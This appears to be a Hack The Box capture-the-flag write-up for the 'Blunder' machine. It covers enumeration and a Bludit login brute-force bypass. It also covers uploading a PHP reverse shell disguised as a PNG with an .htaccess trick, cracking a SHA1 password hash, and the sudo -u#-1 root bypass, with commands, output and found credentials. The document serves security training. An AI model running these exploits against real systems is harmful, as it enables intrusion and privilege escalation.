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Port Scan

u505@naos:~/HTB/Machines/Blunder$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2021-01-07 18:37:33 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on
u505@naos:~/HTB/Machines/Blunder$ nmap -sC -sV blunder
Starting Nmap 7.91 ( ) at 2021-01-07 13:36 EST
Nmap scan report for blunder (
Host is up (0.037s latency).
Not shown: 998 filtered ports
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds

Web enumeration



Nothing interresting.

u505@naos:~/HTB/Machines/Blunder$ curl http://blunder/robots.txt
User-agent: *
Allow: /


u505@naos:~/HTB/Machines/Blunder$ python3 /opt/utils/dirsearch/ -w /usr/share/wordlists/dirb/common.txt -e "txt,html,php,js" -f -t 100 -u http://blunder

_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, html, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 27664
Error Log: /opt/utils/dirsearch/logs/errors-21-01-04_14-43-05.log
Target: http://blunder/
Output File: /opt/utils/dirsearch/reports/blunder/_21-01-04_14-43-05.txt
[14:43:05] Starting: [14:43:06] 403 - 272B - /.hta.html [14:43:06] 403 - 272B - /.hta.js [14:43:06] 403 - 272B - /.hta.php [14:43:06] 403 - 272B - /.hta/ [14:43:06] 403 - 272B - /.htpasswd.php [14:43:06] 403 - 272B - /.htpasswd.txt [14:43:06] 403 - 272B - /.htaccess.php [14:43:06] 403 - 272B - /.htaccess.html [14:43:06] 403 - 272B - /.htpasswd.html [14:43:07] 403 - 272B - /.htaccess.js [14:43:07] 403 - 272B - /.hta.txt [14:43:07] 403 - 272B - /.htpasswd.js [14:43:09] 200 - 7KB - /0 [14:43:12] 200 - 3KB - /about [14:43:13] 301 - 0B - /admin -> [14:43:13] 200 - 2KB - /admin/ [14:44:19] 403 - 272B - /icons/ [14:44:23] 200 - 30B - /install.php [14:44:31] 200 - 1KB - /LICENSE [14:45:16] 200 - 22B - /robots.txt [14:45:22] 403 - 272B - /server-status [14:45:22] 403 - 272B - /server-status/ [14:45:42] 200 - 118B - /todo.txt
Task Completed


u505@naos:~/HTB/Machines/Blunder$ curl http://blunder/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

admin page

Blunder03.png The CMS is Blundit.

Shell access

u505@naos:~/HTB/Machines/Blunder$ searchsploit bludit
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Bludit  3.9.2 - Authentication Bruteforce Mitigation Bypass           | php/webapps/48746.rb
Bludit - Directory Traversal Image File Upload (Metasploit)           | php/remote/47699.rb
Bludit 3.9.12 - Directory Traversal                                   | php/webapps/
Bludit 3.9.2 - Auth Bruteforce Bypass                                 | php/webapps/
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)          | php/webapps/49037.rb
Bludit 3.9.2 - Directory Traversal                                    | multiple/webapps/48701.txt
bludit Pages Editor 3.0.0 - Arbitrary File Upload                     | php/webapps/46060.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

There are 2 exploits, the fist one is an authentication brute force by pass. And the second allows to upload php files to the server. The second exploit needs to be authenticated.

Brute force authentication (CVE-2019-17240)

Blundit has a anti-brute force mechanism that block login attempts after 10 invalid logins. But it trusts Proxy forwarded IP. If the header X-Forwarded-For is randomized, the anti brute force mechanism is abused.

public function getUserIp()
  if (getenv('HTTP_X_FORWARDED_FOR')) {
    $ip = getenv('HTTP_X_FORWARDED_FOR');
  } elseif (getenv('HTTP_CLIENT_IP')) {
    $ip = getenv('HTTP_CLIENT_IP');
  } else {
    $ip = getenv('REMOTE_ADDR');
  return $ip;
u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 48942
  Exploit: Bludit 3.9.2 - Auth Bruteforce Bypass
     Path: /usr/share/exploitdb/exploits/php/webapps/
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Blunder/

First I tried with the user fergus and rockyou-50.txt. But I was unsuccessful. Using the works of the web page, was easier.

u505@naos:~/HTB/Machines/Blunder$ cewl http://blunder > words
u505@naos:~/HTB/Machines/Blunder$ cat users.txt
u505@naos:~/HTB/Machines/Blunder$ python3 -l -u users.txt -p words
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

[◓] Brute Force: Testing -> fergus:CeWL 5.4.8 (Inclusion) Robin Wood ( ( [◥] Brute Force: Testing -> fergus:the ... [◑] Brute Force: Testing -> fergus:best [├] Brute Force: Testing -> fergus:fictional [▝] Brute Force: Testing -> fergus:character [◐] Brute Force: Testing -> fergus:RolandDeschain
[*] SUCCESS !! [+] Use Credential -> fergus:RolandDeschain Fatal Python error: _enter_buffered_busy: could not acquire lock for <_io.BufferedWriter name='<stdout>'> at interpreter shutdown, possibly due to daemon threads Python runtime state: finalizing (tstate=0x25aa750)
Current thread 0x00007f02eb077740 (most recent call first): <no Python frame> Aborted


Reverse shell (CVE-2019-16113)

u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 48701
  Exploit: Bludit 3.9.2 - Directory Traversal
     Path: /usr/share/exploitdb/exploits/multiple/webapps/48701.txt
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Blunder/48701.txt

The exploit consist to upload a php file with an image extension, and an .htaccess file to abuse the server to interpret image extensions as php files.

u505@naos:~/HTB/Machines/Blunder$ head 48701.txt -n 17
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage:
# Software Link:
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module

#### USAGE #### # 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP # 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir # 3. Run the exploit # 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc # 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
u505@naos:~/HTB/Machines/Blunder$ sed -n '19,$ p' 48701.txt >
u505@naos:~/HTB/Machines/Blunder$ chmod +x

Prepare our reverse shell.

u505@naos:~/HTB/Machines/Blunder$ grep CHANGE u505.php
$ip = '';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

Rename it as an image file.

u505@naos:~/HTB/Machines/Blunder$ cp u505.php evil.png

Generate the .htaccess file.

u505@naos:~/HTB/Machines/Blunder$ echo "RewriteEngine off" > .htaccess
u505@naos:~/HTB/Machines/Blunder$ echo "AddType application/x-httpd-php .png" >> .htaccess

Change parameters inside script.

u505@naos:~/HTB/Machines/Blunder$ grep ME
url = ''  # CHANGE ME
username = 'fergus'  # CHANGE ME
password = 'RolandDeschain'  # CHANGE ME
payload = 'evil.png'  # CREATE ME
payload2 = '.htaccess'  # CREATE ME

Raise our listener

u505@naos:~/HTB/Machines/Blunder$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( )
Ncat: Listening on :::4444
Ncat: Listening on

Upload the files

u505@naos:~/HTB/Machines/Blunder$ python3
cookie: cf9irqqhraiprjlee00gtdqi63
csrf_token: 4069559be8dac1facccaa033b4a578f45f31881c
Uploading payload: evil.png
Uploading payload: .htaccess

Call our "image"

u505@naos:~/HTB/Machines/Blunder$ curl

The reverse shell opens.

u505@naos:~/HTB/Machines/Blunder$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 20:36:21 up 59 min,  1 user,  load average: 0.00, 0.00, 0.19
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
shaun    :0       :0               19:37   ?xdm?   1:29   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
python -c 'import pty; pty.spawn("/bin/bash")'

User hugo password

After a long enumeration, there no obvious way to pivot user. At the end I found a user file with an hash in the version 3.10 of blundit.

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}

In 3 seconds the rockyou file was exhasted.

u505@naos:~/HTB/Machines/Blunder$ echo "faca404fd5c0a31cf1897b823c695c85cffeb98d" > hash
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting... 
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA1
Hash.Target......: faca404fd5c0a31cf1897b823c695c85cffeb98d
Time.Started.....: Mon Jan  4 15:58:55 2021 (2 secs)
Time.Estimated...: Mon Jan  4 15:58:57 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7913.6 kH/s (5.62ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 42c Util: 41% Core:1137MHz Mem:2505MHz Bus:16

Started: Mon Jan 4 15:58:54 2021 Stopped: Mon Jan 4 15:58:57 2021

I run a second attempt with rockyou file and best 64 rules.

u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat (v6.1.1) starting...

Session..........: hashcat Status...........: Cracked Hash.Name........: SHA1 Hash.Target......: faca404fd5c0a31cf1897b823c695c85cffeb98d Time.Started.....: Mon Jan 4 16:02:46 2021 (0 secs) Time.Estimated...: Mon Jan 4 16:02:46 2021 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 112.3 MH/s (7.17ms) @ Accel:128 Loops:38 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 7864320/1104517568 (0.71%) Rejected.........: 0/7864320 (0.00%) Restore.Point....: 81920/14344384 (0.57%) Restore.Sub.#1...: Salt:0 Amplifier:0-38 Iteration:0-38 Candidates.#1....: janiece -> mone123 Hardware.Mon.#1..: Temp: 39c Util: 49% Core:1163MHz Mem:2505MHz Bus:16
Started: Mon Jan 4 16:02:46 2021 Stopped: Mon Jan 4 16:02:47 2021
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --show

User flag

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su - hugo
su - hugo

hugo@blunder:~$ cat user.txt cat user.txt <USER_FLAG>

Root flag

Sudo rights

The user hugo has sudo rights

hugo@blunder:~$ sudo -l
sudo -l

Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder: (ALL, !root) /bin/bash

As expected the user cannot sudo as root.

hugo@blunder:~$ sudo /bin/bash
sudo /bin/bash
Sorry, user hugo is not allowed to execute '/bin/bash' as root on blunder.

But he can pivot to user shaun.

hugo@blunder:~$ sudo -u shaun /bin/bash
sudo -u shaun /bin/bash
shaun@blunder:/home/hugo$ id
uid=1000(shaun) gid=1000(shaun) groups=1000(shaun),4(adm),24(cdrom),30(dip),46(plugdev),119(lpadmin),130(lxd),131(sambashare)

User shaun has more rights, but I didn't find a way to own the machine.

Sudo security by-pass (CVE : 2019-14287)

u505@naos:~/HTB/Machines/Blunder$ searchsploit sudo
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Priv | multiple/local/
Apple Mac OSX - Sudo Password Bypass (Metasploit)          | osx/local/27944.rb
Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege E | linux/local/33576.txt
ptrace - Sudo Token Privilege Escalation (Metasploit)      | linux/local/47345.rb
RedStar 3.0 Desktop - Enable sudo Privilege Escalation     | linux/local/
Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privil | bsd/local/1087.c
Sudo 1.5/1.6 - Heap Corruption                             | linux/local/20901.c
Sudo 1.6.3 - Unclean Environment Variable Privilege Escala | linux/local/
Sudo 1.6.8 - Information Disclosure                        | linux/local/24606.c
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privile | linux/local/1310.txt
Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalati | multiple/local/
Sudo 1.6.x - Environment Variable Handling Security Bypass | linux/local/
Sudo 1.6.x - Environment Variable Handling Security Bypass | linux/local/
Sudo 1.6.x - Password Prompt Heap Overflow                 | linux/local/21420.c
sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE B | linux/local/25134.c
sudo 1.8.0 < 1.8.3p1 - Format String                       | linux/dos/18436.txt
Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorize | linux/local/37710.txt
Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Esca | linux/local/42183.c
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow                | linux/local/
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC)          | linux/dos/47995.txt
sudo 1.8.27 - Security Bypass                              | linux/local/
Sudo Perl 1.6.x - Environment Variable Handling Security B | linux/local/26498.txt
sudo.bin - NLSPATH Privilege Escalation                    | linux/local/319.c
SudoEdit 1.6.8 - Local Change Permission                   | linux/local/470.c
ZPanel zsudo - Local Privilege Escalation (Metasploit)     | linux/local/26451.rb
----------------------------------------------------------- ---------------------------------
----------------------------------------------------------- ---------------------------------
 Shellcode Title                                           |  Path
----------------------------------------------------------- ---------------------------------
Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)    | linux_x86/43463.nasm
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL | linux_x86/13331.c
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL | linux_x86/44507.c
----------------------------------------------------------- ---------------------------------
Papers: No Results

This exploit explains the exact same example to by pass the root user control.

u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 47502
  Exploit: sudo 1.8.27 - Security Bypass
     Path: /usr/share/exploitdb/exploits/linux/local/
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Blunder/

The version is smaler than 1.8.27

hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id

So doing the sudo with user -1, it provides access as root user by passing the user control.

hugo@blunder:~$ sudo -u#-1 /bin/bash
root@blunder:/home/hugo# whoami
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt


Daniel Simao 13:05, 7 January 2021 (EST)